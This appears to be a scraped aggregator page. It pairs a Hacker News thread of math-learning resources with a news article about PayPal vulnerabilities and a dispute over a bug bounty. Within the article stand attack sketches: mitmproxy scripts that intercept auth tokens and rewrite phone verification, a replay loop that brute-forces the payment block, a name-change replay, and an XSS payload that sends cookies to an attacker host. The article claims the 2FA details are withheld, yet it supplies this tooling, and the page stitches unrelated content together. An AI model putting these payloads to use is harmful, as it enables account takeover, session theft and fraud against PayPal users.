Since my graduation (~5 years ago) I've been trying to fill this gap, but like you perfectly described, all materials expect you to have a solid basis. I think the problem is that math is huge and people spend a good chunk of their lives learning it (ages 4-17 for the fundamentals alone!), so we fail to see how much it involves and how hard it is for somebody who didn't have a proper education to learn it.

I have been making solid (although slow) progress with https://www.khanacademy.org/. I tried to learn from the top a bunch of times, but always hit a wall and dropped it. I only started moving forward when I decided to go through the basics, algebra and trigonometry 101. It has been a hard and slow journey, but each step comes faster and becomes more rewarding.

0xdeadb00f(10000) 1 day ago [-]

I'm also in a similar situation. I graduated high school and passed mathematics, barely. I didn't absorb any knowledge and switched classes halfway through my last year.

I'm studying CS in University now and will have to do a math-related subject and I'm quite nervous about it, because my mathematics skill is extremely low, and has been my entire life.

I've also been bookmarking guides like this but haven't gotten around to looking into them (pure laziness) other than reading the introduction, which usually says 'this guide assumes high-school level mathematics'.

alenmilk(10000) 1 day ago [-]

https://schoolyourself.org/learn/algebra is great. You start from addition and subtraction and go through your list for the most part. Khan Academy is great too, but with schoolyourself you can walk through it a bit faster.

jostylr(4281) 1 day ago [-]

A few ideas:

* Guesstimation: Solving the World's Problems on the Back of a Cocktail Napkin. Math is a tool: start using it with some simple arithmetic and scientific notation. Once it becomes something you can use and play with in that context, everything else becomes a lot easier. This is water-cooler talk and is something actually usable immediately.

* Speed Mathematics Simplified. From the 1960s. Wonderful book about doing arithmetic from left to right. Also has some good stuff about decimals/fractions/percents as well as checksums. Being quick with arithmetic and getting that number sense makes everything else easier.

* Burn Math Class. Gives an appropriate viewpoint for a lot of math. Gets a little whacky as it goes on, but the core ideas should help you take ownership of math.

* ... gap, not sure what to put in ... maybe Precalculus in a Nutshell... But play around with GeoGebra. Exploring geometry, trigonometry, and precalculus visually is key to building intuition. Get to know the behaviors of the functions, but don't get lost in trig identities or solving random algebraic equations. Things like Newton's method (or the Secant Method) are more important to learn about than lots of arbitrary algebraic simplifications (those can be important too); see the short sketch after this list.

* Vector Calculus, Linear Algebra, and Differential Forms: A Unified Approach. At some point, if you mastered K-12 math and want to get a good mix of theory and application and efficiency, this book by John and Barbara Hubbard is really quite nice. It puts linear algebra in one of its primary contexts of being the main foundation for solving nonlinear systems.
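
Since Newton's method comes up in the list above, here is a minimal sketch of the idea (the function and starting point are arbitrary examples): repeatedly slide down the tangent line to where it crosses zero.

```python
# Newton's method: improve a root guess x by following the tangent of f at x.
def newton(f, df, x0, tol=1e-10, max_iter=50):
    x = x0
    for _ in range(max_iter):
        step = f(x) / df(x)  # tangent-line correction
        x -= step
        if abs(step) < tol:
            break
    return x

# Example: sqrt(2) as the positive root of f(x) = x^2 - 2.
print(newton(lambda x: x * x - 2, lambda x: 2 * x, x0=1.0))  # ~1.4142135623...
```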

billfruit(4265) 1 day ago [-]

I have seen Chrystal's 'Algebra: An Elementary Textbook' recommended as a guide to most of the algebra a working CS person would need. It is about 100 years old, appears to be free of modern pedagogic cruft, and is to the point and densely packed with useful information.

projectileboy(3438) 1 day ago [-]

Although it's not exactly the resource you need to be able to work algebra problems, I highly recommend that you read https://www.feynmanlectures.caltech.edu/I_22.html - Feynman starts with "let's assume we know how to count", and in just a few pages takes you through a lot of math. Even if you don't follow all of the details, it's a nice overview.

dougabug(10000) 1 day ago [-]

Precalculus in a Nutshell is a beautiful little book by George F Simmons, which pretty much captures everything you need to know to undertake the study of calculus. https://www.maa.org/press/maa-reviews/precalculus-mathematic...

Linear algebra is quite a beautiful, approachable subject, and a certain amount of it is necessary to make the leap from single-variable to multi-variable calculus. Without a good grip on calculus, you can't really see what's going on under the covers with linear algebra. What you need to do is precalculus (Simmons) -> single variable calculus -> very introductory/elementary linear algebra -> multi variable calculus (Apostol) -> less introductory but still fairly basic linear algebra (Gilbert Strang, Intro to Linear Algebra) -> mathematical analysis (Apostol) -> Linear Algebra Done Right (Axler). You have to apply a spiral method where you return to subjects as you gain the tools you need to understand them better. You'll never be done understanding geometry, algebra, or analysis.

Also, math is a problem-solving art, and you can't solve problems by reading; you solve them by thinking. Seek out problems that challenge and consolidate your understanding. You should be able to prove everything in Simmons, and it should seem totally natural and intuitive. Then you're ready to struggle with calculus, a subject humanity struggled with for centuries before getting a rigorous handle on it. You probably want to get a handle on the mechanics and intuition first, and for that I've heard that "Calculus Made Easy" by Silvanus Thompson is good.

Don't try to eat too much all at once, you'll make yourself sick. Don't try to cheat yourself of the patient struggle to understand, confusion is completely natural when striving to really know something.

heymijo(10000) 1 day ago [-]

GREAT QUESTION!

tl;dr - don't be afraid to go back to math concepts from elementary school to help you along the way to learning more math.

You have a gaggle of responses to go through, but I want to put this out there anyways.

Algebra is talked about as a 'breaking point' for many Americans; however, the solutions rarely look at what transpired (or didn't) in all those years before a student reached algebra.

Math standards in the United States are set so that ideally:

Kindergarten: learn to count

1st and 2nd grade: learn to think additively (+ and -)

3rd and 4th grade: learn to think multiplicatively (x and division); learn fractions

5th and 6th grade: learn to think in ratios and proportions; learn to think algebraically

Throughout all of those grades you are also supposed to be learning the properties of operations.

By the time you reach an algebra course in 8th grade or 9th grade, it requires you to call upon all of that previous knowledge.

Common problems:

- learning the properties of operations by rote and thus not understanding how to use them to manipulate algebraic equations

- not making the leap from additive to multiplicative reasoning, which hurts a student's ability to understand fractions, which hurts their ability to understand ratios and proportions, which hurts their ability to reason with algebraic equations

- I forgot exponents. Most students know them only by rote, or know only a bit about them, before suddenly seeing huge exponents and negative exponents attached to variables in algebra.

Algebra itself may not be a problem. It is however a strong indicator of knowledge of the above. It's also where the house of cards falls down for students like you and me.

Source: I was a student who math fell apart for in school. I learned all about this when I left the business world to teach 4th grade. I eventually created and piloted an 'Arithmetic to Algebra' course for students to put all of this into practice; students learned, we rejoiced.

fizixer(10000) 1 day ago [-]

Simmons - Precalculus Mathematics in a Nutshell [0] (128 page booklet)

[0] https://books.google.com/books?id=dN1KAwAAQBAJ

ssivark(4149) 1 day ago [-]

IIRC, the Schaum series books have been very good for this level. Very concise, no nonsense, gets to the point simply, and has a bunch of exercises.

One thing I've realized from experience: most books with lots of pictures and thick stacks are faking it (i.e. most college and school math/physics textbooks are not even worth the paper they're printed on). The whole conceptual basis of these subjects is to distill everything down to a few simple ideas, which can then be applied in different contexts. The concise books typically tend to be much better at conveying the essence without bullshit. You just need to read a couple of hundred pages without getting stressed, rather than getting lost in an 800 page book and losing the big picture.

happy-go-lucky(58) 1 day ago [-]

> I find these books very helpful whenever I need to brush up on math

> Each grade folder has a number of chapters, each chapter with a number of exercises, and answers to these in a single file.

> Exemplar Problems (for in-depth learning) with Answers

> Try solving the exercises and problems using pen and paper.

https://github.com/srigalibe/NCERT_India_Grade_Mathematics

marzell(10000) 1 day ago [-]

I'm in a similar situation - been programming for 25 years (off and on) since I started in middle school on my own. But in school we had 'Algebra I' and 'Geometry I', and I never went beyond that. I struggled with quadratic equations and factoring, never heard anything about trigonometry (which I now realize starts in basic geometry) or calculus, and never heard the words 'function' or 'intuition' in regard to maths in school. I tried to do the classic Andrew Ng course on data science and was completely lost every step of the way because of the new language and the fact that his class was nothing like the way I had been taught so long ago.

bumbledraven(2400) 1 day ago [-]

artofproblemsolving.com is excellent. Many of their books, while intended for middle-schoolers, are replete with problems that many adults would find challenging.

khanacademygrad(10000) 1 day ago [-]

Khanacademy

LegitShady(10000) 1 day ago [-]

khan academy. lessons and practice problems. go for it.

kyawzazaw(10000) 1 day ago [-]

Khan Academy has content at that schoolwork level.

pflats(4023) 1 day ago [-]

> Also, curse the Greeks for not using more idiomatic variables. ∑ would never pass code review, what an entirely unreadable identifier

One thing I tell my high-school students: mathematics always looks harder than it actually is. One of the essential skills in succeeding in math is looking at a page of arcane 'stuff' and having your reaction be, 'Whoa! Can't wait to learn what this means,' rather than, 'Whoa! This looks so complicated!'

Mathematics is its own language that has developed across continents and millennia. It has its quirks and foibles, but overall, community consensus has guided its notation. Mathematicians want things to be simple and 'make sense', especially the notation they use. It's never as terrible as it looks.

Sigma specifically is a Greek letter, but the notation is not Greek. Like a large amount of modern mathematical notation, the convention came from Leonhard Euler in the 18th century. It was a disambiguation choice because the letter S was overloaded.

Single-symbol identifiers are enormously popular in mathematics because mathematics is not computing. Because math is (even now) essentially a handwritten subject, its design plays to the strengths of handwriting. Line size, height, and character layout are essentially freeform. Character accents and modifiers are easy. discrete_sum would never fly in a handwritten world, just like ∑ wouldn't pass code review.

rectang(3315) 1 day ago [-]

> At a reasonably quick pace

Consider discarding that requirement.

> that someone with a family + overtime startup hours could still benefit from?

I suggest drilling fundamentals with easy exercises in moments of low quality time. (I often do a few Khan Academy skills during bouts of insomnia. For others it might be the commute, or just before bed, or...) Periodic repetition over the long term is more powerful than cramming.

Save your best quality time for your family and your job. Accept that you will progress in math at a slow pace. Before too long you will nevertheless end up ahead of many successful (!) software engineers who do not have strong math foundations.

quaquaqua1(10000) 1 day ago [-]

SAT prep books such as those from Kaplan or Princeton Review tend to be extremely cheap, if not free, and cover almost all of those topics pretty succinctly :)

Speaking as someone who was kicked out of precalc and then never touched math again despite working as a dev, your point resonates with me :)

sn9(10000) 1 day ago [-]

I would use Khan Academy. Start at a level that feels too easy, even if it's elementary school math. The key to learning anything is to start at a level that feels too easy and gradually increase difficulty.

As you finish a subject, see if there's a corresponding book in the Art of Problem Solving store [0]; you can revisit the subject at a deeper level that will strengthen your foundation. The AoPS books will also expose you to areas useful in programming like discrete mathematics.

Before any of the above, take Coursera's Learning How to Learn course. You'll learn lots of effective strategies to get the most out of your efforts. For example, you can use Anki [1] to remember definitions and concepts you've managed to understand and to schedule review of problems you've already solved.

[0] https://artofproblemsolving.com/store/recommendations.php

[1] http://augmentingcognition.com/ltm.html

vector_spaces(1742) 1 day ago [-]

I like books by Ron Larson, particularly his Trigonometry and Applied Calculus books -- the applied calculus title (intended for social science and business majors) vs his 'Calculus' book (intended for math, physics, and engineering majors) is much gentler for people seeing this material for the first time. Although I do highly recommend his Calculus book once you have the other book down.

Gelfand also has some nice texts on Algebra, Trig, and Geometry that are reasonably cheap, especially if used.

I'm older and went back to school later in life to study math, and these are the books I learned that material (for the first time -- I flunked math thru high school) from.

Here are the exact titles and ISBN-10s:

Ron Larson, Calculus: An Applied Approach, ISBN: 0618218696

Ron Larson, Trigonometry, ISBN: 1133954332

Israel Gelfand, Trigonometry, ISBN: 0817639144

Israel Gelfand, Geometry, ISBN: 1071602977

Israel Gelfand, Algebra, ISBN: 0817636773

And as others have mentioned, Khan Academy is pretty good, although I tend to prefer patrickJMT's explanations a bit more: http://patrickjmt.com/

bemmu(197) 1 day ago [-]

I solved this by just buying all the high school math textbooks and going through those on my own. I preferred this way, because it lets you have the same background as everyone else.

In attempt #1 I was jumping ahead to read the interesting stuff (calculus), and while I could make some progress, it was needlessly difficult because I didn't start from the basics.

In attempt #2 I started from the very beginning (course 1 out of 10 mandatory high school courses) and focused on doing exercises. However, progress was slow, because I would just continue forward when I felt like it.

Finally attempt #3 was successful. I committed to doing exercises in order consistently every day after waking up. This felt great, as every week I was making noticeable progress, and having all the prerequisite knowledge for each next step made progress much easier than I had imagined it could be.

With the slow start but gaining pace towards the later courses, I finished this self-study project in 2 years (could have been close to half that, had I gotten into the groove from the beginning), and found it quite enjoyable. It didn't feel like a chore at all, more like the highlight of each day.

Proziam(10000) 1 day ago [-]

I know a person who tried Khan Academy to get caught up on math after a pretty poor childhood education (they didn't finish middle school). Their feedback was that they were able to get their fundamentals down enough to actually pursue more advanced topics fairly easily (about a year of self-study to go from zero to 'high-school graduate' level.)

From my own personal experience, I would recommend getting to the high-school graduate level and then taking some classes at your local university or community college for topics beyond trigonometry. You'll likely be able to handle everything up to that point on your own without much support, but many people struggle at that point and benefit from having people to ask for help when they need it.

I would wish you the best of luck, but I have no doubt you'll get to where you want to be without it.

injb(10000) 1 day ago [-]

I won't repeat the good suggestions already made, but I'll add this: find a set of the Open University MST124 textbooks. The OU publishes its own maths books, which are specially written for self-study (since that's your only option with the OU), and their courses generally assume very little or no previous knowledge. There's an even more basic course (MST123, I think) if that one is too advanced. These are serious courses that form part of their Mathematics degree, so they are very thorough and, I hate this word, rigorous.

Of course you get the books when you sign up for the course, but it's way cheaper to get the books and study on your own, and you'll get 90% of the information that way.

I don't know if you'll find the pace quick or not; personally I would say that learning maths is very hard, and the materials you use are unlikely to prove to be the bottleneck (spoiler: it's you).

look_lookatme(4090) 1 day ago [-]

The No Bullshit Guide To Math And Physics

https://minireference.com/

I bought the Math and Physics copy because it has an ebook option and the first chapter is the Math guide. I'm going through a few pages a day and it's crisp and straightforward. There is a sample of the first chapter on the site, I suggest you check it out to see if this is what you are looking for.

Found via an HN thread from last year on this topic.

giornogiovanna(4060) 1 day ago [-]

I know these are extremely common suggestions, but...

• 3Blue1Brown has great introductory series on linear algebra and calculus.

• Khan Academy covers pretty much all of US high school mathematics, and you can go through it at whatever pace you want.

• I can send you a few Australian high school textbooks if you want.

smallcharleston(10000) 1 day ago [-]

It's not unidentifiable once you study more. Sigma "is" "roughly" the letter S, and stands for sum. Squiggly S stands for integral (roughly a sum). Intuition for why these things roughly "are" each other takes perhaps more study.

daniel_reetz(10000) 1 day ago [-]

I had the same problem. There is a series of books for folks like us - 'Pre-Algebra Demystified', 'Algebra Demystified', etc. I used them to catch up for a graduate-level statistics course. One hour every morning for three months took me from pre-algebra through trig, and I did very well in the class. I loved these simple books. They contain exactly zero owl-drawing.

scranglis(4269) 1 day ago [-]

Our site (brilliant.org) is designed for your use-case, among others.

throwthrowcatch(10000) 1 day ago [-]

Check out OpenStax: https://openstax.org/

sampo(890) 1 day ago [-]

There are 3 books listed that essentially cover the freshman (first year) courses in Calculus, and 4 for Linear Algebra. If you work your way through even 2 different books for one topic, you are going to have a broader foundation in the topic than a normal math student at a normal university after completing the corresponding course. And you will have spent much more time, too. University courses don't usually cover everything that is in a textbook, and students don't usually read books all the way through. In fact, students usually try to skim the course notes just enough so that they can solve the weekly problem sets.

There is maybe nothing wrong with being thorough with the elementary topics if you're studying for fun. But if you're studying for applications, I think you should cover the basics only adequately, and then quickly move on to more advanced topics. Basic Calculus is only the foundation, stuff that is actually useful in applications comes later. Basic Linear Algebra can be useful in its own right, but the advanced stuff is even more useful.

I suggest building an adequate foundation, not a comprehensively thorough foundation, and then moving on to the more powerful stuff. Which varies depending on what you actually want to use math for.

nsainsbury(3512) about 19 hours ago [-]

To be clear, I don't at all advocate that people work through all the Calculus books. Likewise for the Linear Algebra books. My aim was to provide alternative options (which are easier, cheaper, etc.)

kevstev(10000) about 24 hours ago [-]

Do any of you all have some tips for understanding mathematical notation? I feel this is often poorly explained, and it feels like a language all its own that just does not speak to me. I did pretty well in calculus, but I still don't really understand what the dx was supposed to represent; in reality I was just really good at pattern matching when it wasn't supposed to be there anymore.

I try to read papers with a math orientation now and again, and I quickly get lost trying to connect the concepts to the cryptic formulas; often, when the authors make the 'obvious' transition from step 3 to step 4, I just have no idea how they got there.

I feel this is by far my biggest barrier to understanding most mathematics, and I have thus far found no way to overcome it.

bo1024(10000) about 22 hours ago [-]

I think usually the problem is 'almost getting it' and trying to move forward, which means small uncertainties add up and all of a sudden one is totally lost without being sure exactly why. So it's important to go back and make sure each piece of notation is crystal clear before moving forward.

Any statement in math is meant to be directly translatable to human language. You should be able to read it out loud in English and know exactly what you mean when you say it.

Unfortunately, sometimes math uses awful notation. For example, df/dx. This is a case where df doesn't mean anything (or at least it's not normally well-defined), and dx doesn't mean anything either (same comment). But the notation as a whole means something. If we write g = df/dx, then we can understand that g is a function whose input is x and output is the slope of f at x.
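
To make that concrete, here is the standard definition the df/dx notation abbreviates (nothing beyond a first calculus course):

```latex
% df/dx is one indivisible symbol naming this limit, not a ratio of a "df"
% and a "dx"
\[
  g(x) \;=\; \frac{df}{dx}(x) \;=\; \lim_{h \to 0} \frac{f(x+h) - f(x)}{h}
\]
```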

strls(4292) about 23 hours ago [-]

Sounds like you might simply not understand the definitions of these operators and symbols. In other words, it's not a notation problem. I find that it's helpful to mentally replace symbols like dy/dx, sum, lim, integral, and so on with the concepts they represent. That is, go from operators to definitions.





Historical Discussions: "We found PayPal vulnerabilities and PayPal punished us for it" (February 24, 2020: 955 points)

(957) "We found PayPal vulnerabilities and PayPal punished us for it"

957 points 1 day ago by teslademigod1 in 10000th position

cybernews.com | Estimated reading time – 15 minutes | comments | anchor

In the news, it seems that PayPal gives a lot of money to ethical hackers that find bugs in their tools and services. In March 2018, PayPal announced that they're increasing their maximum bug bounty payment to $30,000 – a pretty nice sum for hackers.

On the other hand, ever since PayPal moved its bug bounty program to HackerOne, its entire system for supporting bug bounty hunters who identify and report bugs has become more opaque, mired in illogical delays, vague responses, and suspicious behavior.

When our analysts discovered six vulnerabilities in PayPal – ranging from dangerous exploits that can allow anyone to bypass their two-factor authentication (2FA), to being able to send malicious code through their SmartChat system – we were met with non-stop delays, unresponsive staff, and lack of appreciation. Below, we go over each vulnerability in detail and why we believe they're so dangerous.

When we pushed the HackerOne staff for clarification on these issues, they removed points from our Reputation scores, relegating our profiles to a suspicious, spammy level. This happened even when the issue was eventually patched: we received no bounty, credit, or even a thanks. Instead, our Reputation scores (which start at 100) were negatively impacted, leaving us worse off than if we'd reported nothing at all.

It's unclear where the majority of the problem lies. Before going through HackerOne, we attempted to communicate directly with PayPal, but we received only copy-paste Customer Support responses and humdrum, say-nothing responses from human representatives.

There also seems to be a larger issue with HackerOne's triage system, in which Security Analysts are employed to check submitted issues before passing them on to PayPal. The only problem: these Security Analysts are hackers themselves, and they have a clear motivation for delaying an issue in order to collect the bounty themselves.

Since there is a lot more money to be made from using or selling these exploits on the black market, we believe the PayPal/HackerOne system is flawed and will lead to fewer ethical hackers providing the necessary help in finding and patching vulnerabilities in PayPal's tools.

Vulnerabilities we discovered

In our analysis of PayPal's mobile apps and website UI, we were able to uncover a series of significant issues. We'll explain these vulnerabilities from the most severe to least severe, as well as how each vulnerability can lead to serious issues for the end user.

#1 Bypassing PayPal's two-factor authentication (2FA)

Using the current version of PayPal for Android (v. 7.16.1), the CyberNews research team was able to bypass PayPal's phone or email verification, which for ease of terminology we can call two-factor authentication (2FA). Their 2FA, which is called "Authflow" on PayPal, is normally triggered when a user logs into their account from a new device, location or IP address.

How we did it

In order to bypass PayPal's 2FA, our researcher used the PayPal mobile app and a MITM proxy, such as Charles Proxy. Then, through a series of steps, the researcher was able to obtain an elevated token to enter the account. (Since the vulnerability hasn't been patched yet, we can't go into the details of how it was done.)

The process is very simple, and only takes seconds or minutes. This means that attackers can gain easy access to accounts, rendering PayPal's lauded security system useless.
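For readers unfamiliar with the tooling: the general setup (not the undisclosed bypass itself) looks roughly like the sketch below, which uses the open-source mitmproxy in place of Charles. It routes the phone's traffic through a proxy addon so the researcher can observe the app's authentication calls. The "auth" URL filter and the "x-session-token" header name are hypothetical placeholders, not PayPal's actual API.

    # A minimal mitmproxy addon sketch: observe a mobile app's auth traffic.
    # The "auth" URL filter and "x-session-token" header are hypothetical.
    from mitmproxy import http

    class AuthFlowInspector:
        def request(self, flow: http.HTTPFlow) -> None:
            # Log only requests that look like authentication calls.
            if "auth" in flow.request.pretty_url:
                print(f"[auth request] {flow.request.method} {flow.request.pretty_url}")

        def response(self, flow: http.HTTPFlow) -> None:
            # Token-bearing responses are where an elevated token would show up.
            if "auth" in flow.request.pretty_url and flow.response:
                token = flow.response.headers.get("x-session-token", "")
                if token:
                    print(f"[token observed] {token[:12]}...")

    addons = [AuthFlowInspector()]
    # Run with: mitmproxy -s authflow_inspector.py
    # then point the phone's Wi-Fi proxy settings at the mitmproxy host.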

What's the worst case scenario here?

Stolen PayPal credentials can go for just $1.50 on the black market. Essentially, it's precisely because it's so difficult to get into people's PayPal accounts with stolen credentials that those credentials are so cheap. PayPal's authflow is set up to detect and block suspicious login attempts, usually tied to a new device or IP address, among other suspicious signals.

But with our 2FA bypass, that security measure is null and void. Hackers can buy stolen credentials in bulk, log in with those credentials, bypass 2FA in minutes, and have complete access to those accounts. With many known and unknown stolen credentials on the market, this is potentially a huge loss for many PayPal customers.

PayPal's response

We'll assume that HackerOne's response is representative of PayPal's response. For this issue, PayPal decided that, since the user's account must already be compromised for this attack to work, "there does not appear to be any security implications as a direct result of this behavior."

Based on that, they closed the issue as Not Applicable, costing us 5 reputation points in the process.

#2 Phone verification without OTP

Our analysts discovered that it's pretty easy to confirm a new phone without an OTP (one-time PIN). PayPal recently introduced a new system that checks whether a phone number is registered under the same name as the account holder. If not, it rejects the phone number.

How we did it

When a user registers a new phone number, a call is made to api-m.paypal.com that carries the status of the phone confirmation. We can easily change this call, and PayPal will then register the phone as confirmed.

The call can be repeated on already registered accounts to verify the phone.
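As a rough illustration of what "changing this call" might look like in practice, here is a mitmproxy addon sketch that rewrites the confirmation status in transit. The direction of the call, the JSON shape, and the "phoneConfirmed" field name are all assumptions; the article does not disclose them.

    # Hypothetical sketch: flip a phone-confirmation status field in the
    # request before it reaches api-m.paypal.com. Path and field are guesses.
    import json
    from mitmproxy import http

    class PhoneConfirmRewriter:
        def request(self, flow: http.HTTPFlow) -> None:
            if flow.request.pretty_host != "api-m.paypal.com":
                return
            if "phone" not in flow.request.path:      # hypothetical routing check
                return
            try:
                body = json.loads(flow.request.get_text())
            except (TypeError, ValueError):
                return
            if "phoneConfirmed" in body:               # hypothetical field name
                body["phoneConfirmed"] = True          # report the phone as confirmed
                flow.request.set_text(json.dumps(body))

    addons = [PhoneConfirmRewriter()]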

What's the worst case scenario here?

Scammers can find plenty of uses for this vulnerability, but the major implication is hard to miss: bypassing this phone verification makes it much easier to create fraudulent accounts, especially since there's no need to receive an SMS verification code.

PayPal's response

Initially, the PayPal team via HackerOne took this issue more seriously. However, after a few exchanges, they stopped responding to our queries, and recently PayPal itself (not the HackerOne staff) locked this report, meaning that we aren't able to comment any longer.

#3 Sending money security bypass

PayPal has set up certain security measures in order to help avoid fraud and other malicious actions on the tool. One of these is a security measure that's triggered when one of the following conditions, or a combination of these, is met:

  • You're using a new device
  • You're trying to send payments from a different location or IP address
  • There's a change in your usual sending pattern
  • The account is not well 'aged' (meaning that it's pretty new)

When these conditions are met, PayPal may show the user one of several errors, including:

  • "You'll need to link a new payment method to send the money"
  • "Your payment was denied, please try again later"

How we did it

Our analysts found that PayPal's sending money security block is vulnerable to brute force attacks.
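The report doesn't say what, exactly, is brute-forced. One plausible reading, sketched below under heavy assumptions, is that the block can be worn down by simply replaying the send-money request until the risk check stops rejecting it; the endpoint and error text are invented placeholders.

    # Hypothetical sketch of a replay-style brute force against a risk block.
    import time
    import requests

    SEND_URL = "https://example.invalid/send-money"    # placeholder endpoint

    def replay_until_accepted(session: requests.Session, payload: dict, max_tries: int = 500):
        for _ in range(max_tries):
            resp = session.post(SEND_URL, json=payload)
            if "payment was denied" not in resp.text:  # placeholder error text
                return resp                            # block no longer triggered
            time.sleep(0.5)                            # naive pacing
        return None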

What's the worst case scenario here?

This is similar in impact to Vulnerability #1 mentioned above. An attacker with access to stolen PayPal credentials can access these accounts after easily bypassing PayPal's security measure.

PayPal's response

When we submitted this to HackerOne, they responded that this is an "out-of-scope" issue since it requires stolen PayPal accounts. As such, they closed the issue as Not Applicable, costing us 5 reputation points in the process.

#4 Full name change

By default, PayPal allows users to change only 1-2 letters of their name, and only once (usually to fix typos). After that, the option to update your name disappears.

However, using the current version of PayPal.com, the CyberNews research team was able to change a test account's name from "Tester IAmTester" to "christin christina".

How we did it

We discovered that if we capture the name-change request and replay it repeatedly, changing 1-2 letters at a time, we are able to fully change account names to something completely different, without any verification.
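The replay logic itself is simple to sketch: morph the current name into the target, changing at most two characters per replayed request. Everything below is illustrative; how PayPal handles name-length changes, in particular, is an assumption.

    # Yield intermediate names, each differing from the last by <= 2 characters.
    def morph_steps(current, target, per_step=2):
        width = max(len(current), len(target))
        cur = list(current.ljust(width))
        tgt = list(target.ljust(width))
        diffs = [i for i in range(width) if cur[i] != tgt[i]]
        for start in range(0, len(diffs), per_step):
            for i in diffs[start:start + per_step]:
                cur[i] = tgt[i]
            yield "".join(cur).rstrip()

    for name in morph_steps("Tester IAmTester", "christin christina"):
        print(name)  # each value would go into the captured name-change request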

We also discovered that we can use any Unicode symbols, including emojis, in the name field.

What's the worst case scenario here?

An attacker armed with stolen PayPal credentials can change the account holder's name. Once the account has been completely taken over, the real account holder wouldn't be able to reclaim it, since the name has been changed and their official documents would be of no assistance.

PayPal's response

This issue was deemed a Duplicate by PayPal, since it had apparently been discovered by another researcher.

#5 The self-help SmartChat stored XSS vulnerability

PayPal's self-help chat, which it calls SmartChat, lets users find answers to the most common questions. Our researchers discovered that this SmartChat integration is missing crucial validation of the text a person writes.

How we did it

Because the validation is done only on the front end, we were able to use a man-in-the-middle (MITM) proxy to capture the traffic going to PayPal's servers and attach our malicious payload.

What's the worst case scenario here?

Anyone can write malicious code into the chatbox and PayPal's system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account.

With that, the scammer can log into the agent's account, pretend to be a customer support agent, and extract sensitive information from PayPal users.
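For illustration, a stored-XSS payload of the kind described usually takes the classic cookie-exfiltration shape below. The payload, endpoint, and field name are hypothetical; the article does not disclose the actual request format.

    # Hypothetical sketch: replay the captured SmartChat request with a
    # classic cookie-stealing payload in the message field.
    import requests

    payload = (
        '<img src="x" onerror="'
        "new Image().src='https://attacker.invalid/c?d='"
        "+encodeURIComponent(document.cookie);"
        '">'
    )

    requests.post(
        "https://example.invalid/smartchat/message",   # placeholder endpoint
        json={"message": payload},                     # placeholder field name
    )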

PayPal's response

The same day that we informed PayPal of this issue, they replied that since it isn't 'exploitable externally,' it is a non-issue. However, while we were preparing a full POC (proof of concept) to send them, PayPal appears to have removed the file on which the exploit was based. This suggests that they were not honest with us and quietly patched the problem themselves, providing us with no credit, thanks, or bounty. Instead, they closed this as Not Applicable, costing us another 5 points in the process.

#6 Security questions persistent XSS

This vulnerability is similar to the one above (#5), since PayPal does not sanitize its Security Questions input.

How we did it

Because PayPal's Security Questions input box is not validated properly, we were able to use the MITM method described above.

Here is a screenshot that shows our test code being injected into the account after a refresh, resulting in a massive clickable link:

What's the worst case scenario here?

Attackers can inject scripts to other people's accounts to grab sensitive data. By using Vulnerability #1 and logging in to a user's account, a scammer can inject code that can later run on any computer once a victim logs into their account.

This includes:

  • Showing a fake pop-up saying 'Download the new PayPal app', which could actually deliver malware.
  • Changing the text the user is entering. For example, the scammer can alter the email address where the money is being sent.
  • Keylogging credit card information when the user inputs it.

There are many more ways to use this vulnerability and, like all of these exploits, it's only limited by the scammer's imagination.

PayPal's response

The same day we reported this issue, PayPal responded that it had already been reported. Also on the same day, the vulnerability seems to have been patched on PayPal's side. They deemed this issue a Duplicate, and we lost another 5 points.

PayPal's reputation for dishonesty

PayPal has been on the receiving end of criticism for not honoring its own bug bounty program.

Most ethical hackers will remember the 2013 case of Robert Kugler, the 17-year-old German student who was shafted out of a huge bounty after he discovered a critical bug on PayPal's site. Kugler notified PayPal of the vulnerability on May 19, but PayPal apparently told him that because he was under 18, he was ineligible for the Bug Bounty Program.

According to PayPal, the bug had already been discovered by someone else, though they also admitted that Kugler was simply too young to qualify.

Another researcher earlier found that trying to report serious vulnerabilities in PayPal's software led to long delays. In the end, frustrated, the researcher vowed never to waste his time on PayPal again.

There's also the case of another teenager, Joshua Rogers, also 17 at the time, who said that he was able to easily bypass PayPal's 2FA. He went on to state, however, that PayPal didn't respond to his multiple attempts at communicating the issue.

PayPal acknowledged and downplayed the vulnerability, later patching it, without offering any thanks to Rogers.

The big problem with HackerOne

HackerOne is often hailed as a godsend for ethical hackers, giving companies novel ways to find and patch flaws in their tools, and giving hackers a way to get paid for finding those vulnerabilities.

It's certainly the most popular, especially since big names like PayPal work exclusively with the platform. There have been issues with HackerOne's response, including the huge scandal involving Valve, when a researcher was banned from HackerOne after trying to report a Steam zero-day.

However, its Triage system, which is often seen as an innovation, actually has a serious problem. The way that HackerOne's triage system works is simple: instead of bothering the vendor (HackerOne's customer) with each reported vulnerability, they've set up a system where HackerOne Security Analysts will quickly check and categorize each reported issue and escalate or close the issues as needed. This is similar to the triage system in hospitals.

These Security Analysts are able to identify the problem, try to replicate it, and communicate with the vendor to work on a fix. However, there's one big flaw here: these Security Analysts are also active Bug Bounty Hackers.

Essentially, these Security Analysts get first dibs on reported vulnerabilities. They have full discretion over the severity assigned to an issue, and they have the power to escalate, delay, or close it.

That presents a huge opportunity for them if they act in bad faith. Other critics have pointed out that Security Analysts can first delay a reported vulnerability, report it themselves on a different bug bounty platform, collect the bounty (without disclosing it, of course), and then close the reported issue as Not Applicable, or perhaps Duplicate.

As such, the system is ripe for abuse, especially since Security Analysts on HackerOne use generic usernames, meaning that there's no real way of knowing what they are doing on other bug bounty platforms.

What it all means

All in all, the exact "who is to blame" question is left unanswered at this point, because it is overshadowed by a bigger question: why are these services so irresponsible?

Let's point out a simple combination of vulnerabilities that any malicious actor can use:

  1. Buy PayPal accounts on the black market for pennies on the dollar. (On this .onion website, you can buy a $5,000 PayPal account for just $150 – a return of more than 33x.)
  2. Use Vulnerability #1 to bypass the two-factor authentication easily.
  3. Use Vulnerability #3 to bypass the sending money security and easily send money from the linked bank accounts and cards.

Alternatively, the scammer can use Vulnerability #1 to bypass 2FA and then use Vulnerability #4 to change the account holder's name. That way, the scammer can lock the original owner out of their own account.

While these are just two simple ways to use our discovered vulnerabilities, scammers – who have much more motivation and creativity for maliciousness (as well as a penchant for scalable attacks) – will most likely have many more ways to use these exploits.

And yet, to PayPal and HackerOne, these are non-issues. Even worse, it seems that you'll just get punished for reporting them.




All Comments: [-] | anchor

ohithereyou(10000) 1 day ago [-]

I've seen several stories about how HackerOne doesn't pay out bug bounties when bugs are reported. I, for one, wouldn't submit bugs/PoC to them, and I would actively, publicly, and immediately disclose bugs that affect anybody who is a client of HackerOne.

